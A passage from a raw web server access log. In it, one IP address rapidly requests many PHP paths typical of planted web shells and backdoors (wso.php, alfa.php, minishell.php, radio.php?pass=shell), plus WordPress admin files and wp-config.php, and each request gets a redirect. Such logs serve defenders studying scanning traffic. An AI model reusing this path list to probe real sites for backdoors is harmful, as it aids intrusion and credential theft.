/lock360.php HTTP/1.1" 301 242 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:57:05 -0400] "GET /lock.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:57:05 -0400] "GET /log.php HTTP/1.1" 301 238 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:57:05 -0400] "GET /login.php HTTP/1.1" 301 240 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:57:05 -0400] "GET /local.php HTTP/1.1" 301 240 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:57:05 -0400] "GET /lx.php HTTP/1.1" 301 237 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:57:05 -0400] "GET /m.php HTTP/1.1" 301 236 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:57:05 -0400] "GET /mah.php HTTP/1.1" 301 238 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:57:05 -0400] "GET /mad.php HTTP/1.1" 301 238 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:57:06 -0400] "GET /lv.php HTTP/1.1" 301 237 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:57:06 -0400] "GET /marijuana.php HTTP/1.1" 301 244 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:57:06 -0400] "GET /mail.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:57:06 -0400] "GET /manager.php HTTP/1.1" 301 242 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:57:06 -0400] "GET /mari.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:57:06 -0400] "GET /mar.php HTTP/1.1" 301 238 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:57:06 -0400] "GET /mass.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:57:06 -0400] "GET /MARIJUANA.php HTTP/1.1" 301 244 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:57:06 -0400] "GET /mas.php HTTP/1.1" 301 238 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:57:06 -0400] "GET /mini.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:57:06 -0400] "GET /min.php HTTP/1.1" 301 238 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:57:07 -0400] "GET /mrjn.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:57:07 -0400] "GET /minishell.php HTTP/1.1" 301 244 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:57:07 -0400] "GET /n.php HTTP/1.1" 301 236 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:57:07 -0400] "GET /new.php HTTP/1.1" 301 238 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:57:07 -0400] "GET /new-index.php HTTP/1.1" 301 244 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:57:07 -0400] "GET /nn.php HTTP/1.1" 301 237 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:57:07 -0400] "GET /ninja.php HTTP/1.1" 301 240 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:57:07 -0400] "GET /NewFile.php HTTP/1.1" 301 242 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:57:07 -0400] "GET /ok.php HTTP/1.1" 301 237 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:57:07 -0400] "GET /o.php HTTP/1.1" 301 236 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:57:07 -0400] "GET /pi.php HTTP/1.1" 301 237 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:57:07 -0400] "GET /phpinfo.php?re@=vo@ HTTP/1.1" 301 250 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:57:07 -0400] "GET /p.php HTTP/1.1" 301 236 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:57:07 -0400] "GET /priv.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:57:07 -0400] "GET /priv8.php HTTP/1.1" 301 240 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:57:08 -0400] "GET /qindex.php HTTP/1.1" 301 241 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:57:08 -0400] "GET /r.php HTTP/1.1" 301 236 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:57:08 -0400] "GET /q.php HTTP/1.1" 301 236 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:57:08 -0400] "GET /r00t.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:57:08 -0400] "GET /radio.php HTTP/1.1" 301 240 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:57:08 -0400] "GET /radio.php?pass=shell HTTP/1.1" 301 251 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:57:08 -0400] "GET /raw.php HTTP/1.1" 301 238 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:57:08 -0400] "GET /readme.php HTTP/1.1" 301 241 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:57:08 -0400] "GET /root.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:57:08 -0400] "GET /rss.php HTTP/1.1" 301 238 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:57:08 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:57:08 -0400] "GET /s.php HTTP/1.1" 301 236 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:57:08 -0400] "GET /seo.php HTTP/1.1" 301 238 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:57:08 -0400] "GET /shl.php HTTP/1.1" 301 238 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:57:08 -0400] "GET /shx.php HTTP/1.1" 301 238 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 94.16.113.252 - - [12/Aug/2025:20:57:08 -0400] "GET /wp-content/themes/about.php HTTP/1.1" 301 262 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:57:08 -0400] "GET /sym.php HTTP/1.1" 301 238 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:57:08 -0400] "GET /style.php HTTP/1.1" 301 240 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:57:08 -0400] "GET /simple.php HTTP/1.1" 301 241 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:57:08 -0400] "GET /Sym.php HTTP/1.1" 301 238 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:57:08 -0400] "GET /sym403.php HTTP/1.1" 301 241 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:57:09 -0400] "GET /t.php HTTP/1.1" 301 236 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:57:09 -0400] "GET /sys.php HTTP/1.1" 301 238 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:57:09 -0400] "GET /symlink.php HTTP/1.1" 301 242 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:57:09 -0400] "GET /tes.php HTTP/1.1" 301 238 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:57:09 -0400] "GET /test.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:57:10 -0400] "GET /unknown.php HTTP/1.1" 301 242 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:57:10 -0400] "GET /u.php HTTP/1.1" 301 236 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:57:10 -0400] "GET /tinyfilemanager.php HTTP/1.1" 301 250 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:57:10 -0400] "GET /upfile.php HTTP/1.1" 301 241 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:57:10 -0400] "GET /up.php HTTP/1.1" 301 237 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:57:10 -0400] "GET /upgrade.php HTTP/1.1" 301 242 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:57:10 -0400] "GET /uploader.php HTTP/1.1" 301 243 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:57:10 -0400] "GET /ups.php HTTP/1.1" 301 238 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:57:10 -0400] "GET /uploads.php HTTP/1.1" 301 242 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:57:11 -0400] "GET /upload.php HTTP/1.1" 301 241 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:57:11 -0400] "GET /v.php HTTP/1.1" 301 236 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:57:11 -0400] "GET /wp_cron.php HTTP/1.1" 301 242 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:57:11 -0400] "GET /usr.php HTTP/1.1" 301 238 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:57:11 -0400] "GET /vuln.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:57:11 -0400] "GET /w.php HTTP/1.1" 301 236 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:57:11 -0400] "GET /wp-.php HTTP/1.1" 301 238 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:57:11 -0400] "GET /wp-about.php HTTP/1.1" 301 243 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:57:11 -0400] "GET /wp_wrong_datlib.php HTTP/1.1" 301 250 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:57:11 -0400] "GET /wp-access.php HTTP/1.1" 301 244 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:57:11 -0400] "GET /wp-activate.php HTTP/1.1" 301 246 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:57:12 -0400] "GET /wp-admin/alfa.php HTTP/1.1" 301 248 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:57:12 -0400] "GET /wp-admin/about.php HTTP/1.1" 301 249 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:57:12 -0400] "GET /wp-admin/admin.php HTTP/1.1" 301 249 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:57:12 -0400] "GET /wp-admin/css/colors/ectoplasm/zmFM.php HTTP/1.1" 301 269 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:57:12 -0400] "GET /wp-admin/css/colors/index.php HTTP/1.1" 301 260 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:57:12 -0400] "GET /wp-admin/css/index.php HTTP/1.1" 301 253 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:57:12 -0400] "GET /wp-admin/css/colors/xmrlpc.php?p= HTTP/1.1" 301 264 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:57:12 -0400] "GET /wp-admin/fw.php HTTP/1.1" 301 246 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:57:12 -0400] "GET /wp-admin/images/about.php HTTP/1.1" 301 256 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:57:13 -0400] "GET /wp-admin/dropdown.php HTTP/1.1" 301 252 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:57:13 -0400] "GET /wp-admin/images/index.php HTTP/1.1" 301 256 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:57:13 -0400] "GET /wp-admin/index.php HTTP/1.1" 301 249 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:57:13 -0400] "GET /wp-admin/images/admin.php HTTP/1.1" 301 256 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:57:13 -0400] "GET /wp-admin/includes/atomlib.php HTTP/1.1" 301 260 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:57:13 -0400] "GET /wp-admin/includes/index.php HTTP/1.1" 301 258 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:57:13 -0400] "GET /wp-admin/js/index.php HTTP/1.1" 301 252 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:57:13 -0400] "GET /wp-admin/install.php HTTP/1.1" 301 251 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:57:13 -0400] "GET /wp-admin/inputs.php HTTP/1.1" 301 250 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:57:13 -0400] "GET /wp-admin/maint/index.php HTTP/1.1" 301 255 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:57:13 -0400] "GET /wp-admin/network/index.php HTTP/1.1" 301 257 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:57:14 -0400] "GET /wp-admin/themes.php HTTP/1.1" 301 250 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:57:14 -0400] "GET /wp-admin/radio.php HTTP/1.1" 301 249 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:57:14 -0400] "GET /wp-admin/plugins.php HTTP/1.1" 301 251 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:57:14 -0400] "GET /wp-admin/upload.php HTTP/1.1" 301 250 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:57:14 -0400] "GET /wp-admin/user/about.php HTTP/1.1" 301 254 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:57:14 -0400] "GET /wp-admin/wso.php HTTP/1.1" 301 247 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:57:14 -0400] "GET /wp-admin/wp-login.php HTTP/1.1" 301 252 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:57:14 -0400] "GET /wp-admin/user/index.php HTTP/1.1" 301 254 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:57:14 -0400] "GET /wp-atom.php HTTP/1.1" 301 242 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:57:14 -0400] "GET /wp-blog-header.php HTTP/1.1" 301 249 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:57:15 -0400] "GET /wp-config.php HTTP/1.1" 301 244 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:57:15 -0400] "GET /wp-config-sample.php HTTP/1.1" 301 251 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:57:15 -0400] "GET /wp-conctent.php HTTP/1.1" 301 246 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:57:15 -0400] "GET /wp-conflg.php HTTP/1.1" 301 244 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) 